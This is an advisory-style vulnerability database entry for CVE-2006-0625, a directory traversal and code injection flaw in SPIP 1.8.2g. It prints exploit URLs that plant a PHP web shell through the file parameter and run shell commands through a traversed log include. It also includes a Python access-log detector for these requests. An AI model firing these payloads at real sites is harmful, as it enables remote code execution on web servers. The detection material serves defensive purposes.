SPIP Spip_RSS.PHP Directory Traversal Vulnerability

Vulnerability ID: 1109713
Vulnerability type: Path traversal
Published: 2006-02-08
Updated: 2006-02-09
CVE ID: CVE-2006-0625
CNNVD-ID: CNNVD-200602-123
Platform: PHP
CVSS score: 6.4
|Vulnerability Source
https://www.exploit-db.com/exploits/27172
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-123
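|Vulnerability Details
Spip_RSS.PHP in SPIP 1.8.2g and earlier contains a directory traversal vulnerability. A remote attacker can read or include arbitrary files via .. sequences in the GLOBALS[type_urls] parameter, which can then be used to execute arbitrary code through direct static code injection in the file parameter to spip_acces_doc.php3.
|Exploit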
source: http://www.securityfocus.com/bid/16556/info

SPIP is prone to a remote command-execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP commands on an affected computer with the privileges of the webserver process.

Successful exploitation could facilitate unauthorized access; other attacks are also possible.

Versions 1.8.2g and earlier are vulnerable; other versions may also be affected.

http://www.example.com/spip_rss.php?GLOBALS[type_urls]=/../ecrire/data/spip.log%00

http://www.example.com/spip_acces_doc.php3?id_document=0&file=<?system($_GET[cmd]);?>
http://www.example.com/spip_rss.php?cmd=ls%20-la&GLOBALS[type_urls]=/../ecrire/data/spip.log%00
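
The request shapes listed above can be matched in web-server access logs. The following detection sketch is an added example, not part of the original advisory or of SPIP's code; the log lines, rule names and function names are constructed for illustration and assume the common/combined access-log format.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines for illustration (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Feb/2006:10:01:02 +0000] "GET /spip_rss.php?id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Feb/2006:10:01:09 +0000] "GET /spip_acces_doc.php3'
    '?id_document=0&file=%3C%3Fsystem(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1" 200 0',
    '198.51.100.7 - - [09/Feb/2006:10:01:15 +0000] "GET /spip_rss.php'
    '?cmd=id&GLOBALS%5Btype_urls%5D=/../ecrire/data/spip.log%00 HTTP/1.1" 200 812',
    '203.0.113.20 - - [09/Feb/2006:10:02:00 +0000] "GET /spip_acces_doc.php3'
    '?id_document=12&file=IMG/report.pdf HTTP/1.1" 200 48211',
]

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
DOTDOT = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # ".." as a whole path segment


def findings(line):
    """Return the names of the rules that one access-log line triggers."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    hits = []
    # parse_qsl percent-decodes keys and values, so %5B, %2e%2e and %00 are normalised.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "GLOBALS" or key.startswith("GLOBALS["):
            hits.append("globals-override")  # request tries to set a PHP global
            if (script == "spip_rss.php" and key == "GLOBALS[type_urls]"
                    and (DOTDOT.search(value) or "\x00" in value)):
                hits.append("type_urls-traversal")
        if script == "spip_acces_doc.php3" and key == "file" and "<?" in value:
            hits.append("php-code-in-file-param")  # PHP open tag in the file parameter
    return hits


def scan(lines):
    """Return (line_number, rule_names) for every line with at least one hit."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := findings(line))]


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, ", ".join(hits))
```

Access logs record only the request line, so parameters sent in a POST body are not visible to this check.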
|References

Source: BID
Name: 16556
Link: http://www.securityfocus.com/bid/16556
Source: VUPEN
Name: ADV-2006-0483
Link: http://www.frsirt.com/english/advisories/2006/0483
Source: MISC
Link: http://retrogod.altervista.org/spip_182g_shell_inj_xpl.html
Source: XF
Name: spip-rss-file-include(24600)
Link: http://xforce.iss.net/xforce/xfdb/24600
Source: OSVDB
Name: 23086
Link: http://www.osvdb.org/23086
Source: SECTRACK
Name: 1015602
Link: http://securitytracker.com/id?1015602
Source: SECUNIA
Name: 18676
Link: http://secunia.com/advisories/18676